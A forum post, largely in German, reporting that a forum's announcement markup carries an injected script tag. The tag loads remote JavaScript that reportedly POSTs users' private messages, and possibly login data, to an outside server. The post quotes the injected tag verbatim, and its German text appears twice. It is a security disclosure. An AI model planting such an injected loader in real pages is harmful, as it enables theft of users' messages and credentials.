You have a serious security problem. My English is too bad to explain it exactly..
so i do it in German. Maybe someone else can translate this.
wenn man zb. diese URL(http://www.akiba-online.com/forumdisplay.php?f=103)
aufruft wird bei Announcement (siehe Quellcode) ein Script aufgerufen.
<a href="announcement.php?f=103"><script src="http://www.nogripracing.com/forum/clientscript/g/l.js"></script></a>
Dieses Script sendet sämtliche Privaten Nachrichten, im XML Format, per POST
nach http://www.nogripracing.com/forum/clientscript/g/data.php (habe es geloggt)
Ausserdem ist es sehr wahrscheinlich das auch die Logindaten übermittelt wurden.
so i do it in German. Maybe someone else can translate this.
wenn man zb. diese URL(http://www.akiba-online.com/forumdisplay.php?f=103)
aufruft wird bei Announcement (siehe Quellcode) ein Script aufgerufen.
<a href="announcement.php?f=103"><script src="http://www.nogripracing.com/forum/clientscript/g/l.js"></script></a>
Dieses Script sendet sämtliche Privaten Nachrichten, im XML Format, per POST
nach http://www.nogripracing.com/forum/clientscript/g/data.php (habe es geloggt)
Ausserdem ist es sehr wahrscheinlich das auch die Logindaten übermittelt wurden.
Last edited by a moderator: